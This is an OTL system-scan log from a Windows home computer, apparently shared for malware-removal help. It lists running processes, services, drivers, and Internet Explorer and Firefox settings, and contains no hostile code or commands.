Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.00 Gb Total Physical Memory | 1.73 Gb Available Physical Memory | 57.84% Memory free
6.20 Gb Paging File | 4.72 Gb Available in Paging File | 76.12% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111.69 Gb Total Space | 51.32 Gb Free Space | 45.95% Space Free | Partition Type: NTFS
Drive D: | 111.43 Gb Total Space | 35.69 Gb Free Space | 32.03% Space Free | Partition Type: NTFS
Drive F: | 74.53 Gb Total Space | 29.77 Gb Free Space | 39.95% Space Free | Partition Type: NTFS
 
Computer Name: KEN-HOME | User Name: Ken | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/05/20 08:28:38 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
PRC - [2014/05/19 12:49:22 | 005,625,624 | ---- | M] (SUPERAntiSpyware) -- C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
PRC - [2014/05/07 21:52:34 | 032,668,056 | ---- | M] (Dropbox, Inc.) -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\Dropbox.exe
PRC - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\MsMpEng.exe
PRC - [2014/03/11 10:13:14 | 000,951,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Security Client\msseces.exe
PRC - [2013/04/25 19:32:22 | 000,602,112 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanCU.exe
PRC - [2013/04/23 03:48:17 | 010,244,448 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\TeamViewer.exe
PRC - [2013/04/23 03:48:17 | 003,574,624 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
PRC - [2013/04/23 03:40:59 | 000,193,888 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\tv_w32.exe
PRC - [2013/02/12 22:37:16 | 001,263,952 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
PRC - [2013/01/30 11:41:30 | 000,430,080 | ---- | M] (Realtek) -- C:\Windows\SwUSB.exe
PRC - [2013/01/18 10:21:02 | 000,873,248 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
PRC - [2013/01/18 10:21:00 | 001,821,984 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
PRC - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2012/12/14 15:54:26 | 000,036,864 | ---- | M] () -- C:\Windows\runSW.exe
PRC - [2012/10/23 18:58:52 | 000,120,728 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
PRC - [2012/10/23 18:58:40 | 000,694,168 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
PRC - [2012/09/08 10:18:45 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) -- C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
PRC - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) -- C:\Program Files\Motorola\MotForwardDaemon\ForwardDaemon.exe
PRC - [2011/03/18 13:53:06 | 000,924,632 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2010/11/23 22:21:18 | 000,130,000 | R--- | M] (Symantec Corporation) -- C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\ccSvcHst.exe
PRC - [2010/03/18 19:17:48 | 000,019,456 | ---- | M] (Creative Technology Ltd) -- C:\Windows\System32\CtHelper.exe
PRC - [2010/02/12 10:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) -- C:\Program Files\Creative\Shared Files\CTAudSvc.exe
PRC - [2009/04/11 02:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2009/03/05 16:07:20 | 002,260,480 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
PRC - [2009/02/19 16:10:54 | 000,238,968 | ---- | M] (Symantec Corporation) -- C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe
PRC - [2009/01/26 15:31:10 | 001,153,368 | ---- | M] (Safer Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
PRC - [2008/11/12 17:01:14 | 003,425,632 | ---- | M] (Symantec Corporation) -- C:\Program Files\Norton Ghost\Agent\VProSvc.exe
PRC - [2008/06/26 19:09:36 | 000,167,936 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanWpsSvc.exe
PRC - [2008/01/29 17:38:31 | 000,583,048 | ---- | M] (Symantec Corporation) -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe
PRC - [2007/02/27 19:08:38 | 000,689,672 | ---- | M] (American Power Conversion Corporation) -- C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
PRC - [2007/02/13 07:26:50 | 000,053,248 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/05/20 14:00:24 | 000,041,984 | ---- | M] () -- c:\Users\Ken\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmprtbsin.dll
MOD - [2014/01/02 23:42:50 | 003,610,624 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll
MOD - [2013/10/18 19:55:02 | 025,100,288 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\libcef.dll
MOD - [2013/09/05 00:14:10 | 004,300,456 | ---- | M] () -- C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
MOD - [2013/04/25 19:32:22 | 000,602,112 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanCU.exe
MOD - [2013/02/12 22:38:06 | 000,100,688 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2013/02/12 22:37:16 | 001,263,952 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
MOD - [2012/10/23 18:58:40 | 000,694,168 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
MOD - [2011/12/13 11:10:00 | 000,413,696 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanDll.dll
MOD - [2011/05/18 11:53:44 | 001,496,576 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\components\frozen.dll
MOD - [2011/05/18 11:53:44 | 000,343,552 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\googletoolbar-ff4.dll
MOD - [2011/03/18 13:53:11 | 001,874,904 | ---- | M] () -- C:\Program Files\Mozilla Firefox\mozjs.dll
MOD - [2010/10/20 16:45:26 | 008,801,120 | ---- | M] () -- C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
MOD - [2009/05/14 10:27:32 | 000,294,912 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WPSCtrl.dll
 
 
========== Services (SafeList) ==========
 
SRV - File not found [Auto | Running] -- C:\Program Files\Spybot -- (SBSDWSCService)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe /h ccCommon -- (LiveUpdate Notice Ex)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe /h ccCommon -- (CLTNetCnService)
SRV - [2014/03/11 10:13:24 | 000,279,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2013/12/19 00:41:02 | 030,814,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)
SRV - [2013/04/23 03:48:17 | 003,574,624 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe -- (TeamViewer8)
SRV - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2012/12/14 15:54:26 | 000,036,864 | ---- | M] () [Auto | Running] -- C:\Windows\runSW.exe -- (RunSwUSB)
SRV - [2012/12/03 11:39:40 | 001,259,880 | ---- | M] (NVIDIA Corporation) [Auto | Stopped] -- C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2012/10/23 18:58:52 | 000,120,728 | ---- | M] () [Auto | Running] -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe -- (Motorola Device Manager)
SRV - [2012/09/08 10:18:45 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) [Auto | Running] -- C:\Program Files\SUPERAntiSpyware\SASCORE.EXE -- (!SASCORE)
SRV - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) [Auto | Running] -- C:\Program Files\Motorola\MotForwardDaemon\ForwardDaemon.exe -- (PST Service)
SRV - [2011/04/12 17:24:09 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files\Common Files\Creative Labs Shared\Service\AL6Licensing.exe -- (Creative ALchemy AL6 Licensing Service)
SRV - [2011/04/12 17:11:04 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files\Common Files\Creative Labs Shared\Service\CTAELicensing.exe -- (Creative Audio Engine Licensing Service)
SRV - [2010/11/23 22:21:18 | 000,130,000 | R--- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\ccSvcHst.exe -- (NSL)
SRV - [2010/02/12 10:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) [Auto | Running] -- C:\Program Files\Creative\Shared Files\CTAudSvc.exe -- (CTAudSvcService)
SRV - [2009/08/18 00:19:24 | 000,093,848 | ---- | M] (SiSoftware) [On_Demand | Stopped] -- C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011\RpcAgentSrv.exe -- (SandraAgentSrv)
SRV - [2009/02/19 16:10:54 | 000,238,968 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe -- (Automatic LiveUpdate Scheduler)
SRV - [2009/02/19 16:09:53 | 003,220,856 | ---- | M] (Symantec Corporation) [On_Demand | Stopped] -- C:\Program Files\Symantec\LiveUpdate\LuComServer_3_4.EXE -- (LiveUpdate)
SRV - [2008/11/12 17:01:14 | 003,425,632 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Norton Ghost\Agent\VProSvc.exe -- (Norton Ghost)
SRV - [2008/06/26 19:09:36 | 000,167,936 | ---- | M] () [Auto | Running] -- C:\Program Files\TRENDnet\TEW-805UB\WlanWpsSvc.exe -- (WlanWpsSvc)
SRV - [2008/01/29 17:38:31 | 000,583,048 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe -- (LiveUpdate Notice Service)
SRV - [2008/01/19 03:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2007/02/27 19:08:38 | 000,689,672 | ---- | M] (American Power Conversion Corporation) [Auto | Running] -- C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe -- (APC UPS Service)
SRV - [2007/02/22 20:53:16 | 002,217,416 | ---- | M] () [Auto | Stopped] -- C:\Program Files\Common Files\Acronis\Acronis Disk Director\oss_reinstall_svc.exe -- (AcronisOSSReinstallSvc)
SRV - [2007/02/13 07:26:50 | 000,053,248 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe -- (eRecoveryService)
 
 
========== Driver Services (SafeList) ==========
 
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\SymIM.sys -- (SymIMMP)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Motousbnet.sys -- (Motousbnet)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motswch.sys -- (MotoSwitchService)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motmodem.sys -- (motmodem)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motodrv.sys -- (MotDev)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motccgpfl.sys -- (motccgpfl)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motccgp.sys -- (motccgp)
DRV - File not found [Kernel | On_Demand | Stopped] -- System32\Drivers\motoandroid.sys -- (motandroidusb)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motfilt.sys -- (BTCFilterService)
DRV - File not found [Kernel | Disabled | Stopped] -- C:\Windows\system32\drivers\blbdrive.sys -- (blbdrive)
DRV - [2014/03/11 09:52:30 | 000,104,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\NisDrvWFP.sys -- (NisDrv)
DRV - [2013/02/26 00:22:06 | 008,939,296 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\nvlddmkm.sys -- (nvlddmkm)
DRV - [2013/02/09 07:23:00 | 001,957,448 | ---- | M] (Realtek Semiconductor Corporation                           ) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\RTWlanU.sys -- (RtlWlanu)
DRV - [2011/08/21 13:10:33 | 000,232,512 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV - [2011/08/02 09:59:41 | 000,105,592 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv)
DRV - [2011/07/22 12:27:02 | 000,012,880 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys -- (SASDIFSV)
DRV - [2011/07/12 17:55:22 | 000,067,664 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS -- (SASKUTIL)
DRV - [2011/05/12 09:44:04 | 000,374,392 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys -- (eeCtrl)
DRV - [2010/09/02 17:49:08 | 000,013,312 | ---- | M] (June Fabrics Technology Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\pneteth.sys -- (pneteth)
DRV - [2010/03/18 20:50:12 | 000,189,528 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\haP17v2k.sys -- (hap17v2k)
DRV - [2010/03/18 20:50:04 | 000,162,904 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\haP16v2k.sys -- (hap16v2k)
DRV - [2010/03/18 20:49:56 | 000,798,808 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ha10kx2k.sys -- (ha10kx2k)
DRV - [2010/03/18 20:45:42 | 000,092,760 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\emupia2k.sys -- (emupia)
DRV - [2010/03/18 20:45:28 | 000,157,272 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctsfm2k.sys -- (ctsfm2k)
DRV - [2010/03/18 20:45:20 | 000,014,424 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctprxy2k.sys -- (ctprxy2k)
DRV - [2010/03/18 20:45:12 | 000,127,576 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctoss2k.sys -- (ossrv)
DRV - [2010/03/18 20:40:48 | 000,347,144 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ctdvda2k.sys -- (ctdvda2k)
DRV - [2010/03/18 20:40:40 | 000,528,472 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctaud2k.sys -- (ctaud2k)
DRV - [2010/03/18 20:40:32 | 000,511,064 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctac32k.sys -- (ctac32k)
DRV - [2010/03/18 20:39:36 | 000,100,952 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTERFXFX.sys -- (CTERFXFX.SYS)
DRV - [2010/03/18 20:39:36 | 000,100,952 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTERFXFX.sys -- (CTERFXFX)
DRV - [2010/03/18 20:39:28 | 000,566,360 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CTSBLFX.sys -- (CTSBLFX.SYS)
DRV - [2010/03/18 20:39:28 | 000,566,360 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTSBLFX.sys -- (CTSBLFX)
DRV - [2010/03/18 20:39:18 | 000,555,096 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CTAUDFX.sys -- (CTAUDFX.SYS)
DRV - [2010/03/18 20:39:18 | 000,555,096 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTAUDFX.sys -- (CTAUDFX)
DRV - [2010/03/18 20:39:10 | 000,099,416 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\COMMONFX.sys -- (COMMONFX.SYS)
DRV - [2010/03/18 20:39:10 | 000,099,416 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\COMMONFX.sys -- (COMMONFX)
DRV - [2009/11/20 15:49:30 | 000,465,408 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\SISGRKMD.sys -- (SiS6350)
DRV - [2009/11/13 12:40:41 | 000,058,416 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\SISAGPX.SYS -- (SISAGP)
DRV - [2009/08/08 00:46:56 | 000,023,112 | ---- | M] (SiSoftware) [Kernel | On_Demand | Stopped] -- C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011\WNt500x86\sandra.sys -- (SANDRA)
DRV - [2009/04/11 00:42:52 | 000,031,616 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUSB)
DRV - [2009/02/04 01:21:11 | 000,005,632 | ---- | M] () [File_System | System | Running] -- C:\Windows\System32\drivers\StarOpen.sys -- (StarOpen)
DRV - [2009/01/08 10:42:54 | 000,036,608 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\System32\FsUsbExDisk.Sys -- (FsUsbExDisk)
DRV - [2008/11/12 16:49:22 | 000,138,080 | ---- | M] (StorageCraft) [File_System | Boot | Running] -- C:\Windows\System32\drivers\symsnap.sys -- (symsnap)
DRV - [2008/02/22 16:33:02 | 000,114,304 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdmdm.sys -- (sscdmdm)
DRV - [2008/02/22 16:33:02 | 000,094,336 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdserd.sys -- (sscdserd)
DRV - [2008/02/22 16:33:02 | 000,014,976 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdmdfl.sys -- (sscdmdfl)
DRV - [2008/02/22 16:33:00 | 000,087,936 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdbus.sys -- (sscdbus)
DRV - [2008/01/04 16:06:37 | 000,114,048 | ---- | M] (Acronis) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\snapman.sys -- (snapman)
DRV - [2007/07/31 17:22:16 | 000,014,072 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vproeventmonitor.sys -- (VProEventMonitor)
DRV - [2007/07/09 06:48:44 | 000,020,622 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\bcmndis.sys -- (USB_NDIS_51)
DRV - [2007/04/23 10:50:50 | 000,025,896 | ---- | M] (Windows ® Codename Longhorn DDK provider) [Kernel | System | Running] -- C:\Windows\System32\drivers\RtlProt.sys -- (RtlProt)
DRV - [2007/03/28 21:49:42 | 000,128,104 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\WimFltr.sys -- (WimFltr)
DRV - [2007/03/28 21:29:10 | 000,037,864 | ---- | M] (Symantec Corporation) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\v2imount.sys -- (v2imount)
DRV - [2007/02/06 14:27:04 | 000,185,728 | ---- | M] (Hauppauge Computer Works, Inc.) [23|25|26]xxx) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\hcwPP2.sys -- (hcwPP2)
DRV - [2007/01/22 04:09:08 | 000,046,592 | ---- | M] (Silicon Integrated Systems Corp.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\SiSGB6.sys -- (SiSGbeLH)
DRV - [2007/01/09 09:22:28 | 000,006,144 | ---- | M] (Chic) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\moufiltr.sys -- (moufiltr)
DRV - [2006/12/07 19:12:02 | 000,076,584 | ---- | M] () [Kernel | Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\int15.sys -- (int15)
DRV - [2006/09/19 17:47:04 | 000,080,744 | ---- | M] (Wasay) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\WSVD.sys -- (WSVD)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://en.us.acer.yahoo.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://en.us.acer.yahoo.com
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.com/0SE...S01?FORM=TOOLBR
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SEARCH PAGE = http://g.msn.com/0SE...S01?FORM=TOOLBR
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultName = Yahoo! Search
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://search.yahoo....=utf-8&fr=b1ie7
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1
IE - HKCU\..\SearchScopes,DefaultScope = {DC3C0BC4-487D-413F-8EF7-81BA5B62BAA5}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search
IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKCU\..\SearchScopes\{DC3C0BC4-487D-413F-8EF7-81BA5B62BAA5}: "URL" = http://www.google.co...1I7GGIH_enUS252
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Google"
FF - prefs.js..browser.search.defaulturl: "http://www.google.co...-8&oe=UTF-8&q="
FF - prefs.js..browser.search.selectedEngine: "Google"
FF - prefs.js..browser.search.update: false
FF - prefs.js..browser.startup.homepage: "https://www.google.com/"
FF - prefs.js..extensions.enabledAddons: {23fcfd51-4958-4f00-80a3-ae97e717ed8b}:2.1.2.172
FF - prefs.js..extensions.enabledItems: {BBDA0591-3099-440a-AA10-41764D9DB4DB}:2.0
FF - prefs.js..extensions.enabledItems: {2D3F3651-74B9-4795-BDEC-6DA2F431CB62}:4.6
FF - prefs.js..extensions.enabledItems: {23fcfd51-4958-4f00-80a3-ae97e717ed8b}:2.1.0.900
FF - prefs.js..extensions.enabledItems: {6904342A-8307-11DF-A508-4AE2DFD72085}:2.1.0.900
FF - user.js - File not found
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Player Plugin,version=1.0.0: C:\Program Files\DivX\DivX Player\npDivxPlayerPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/VirtualEarth3D,version=2.0: C:\Program Files\Virtual Earth 3D\ [2007/12/14 12:10:25 | 000,000,000 | ---D | M]
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
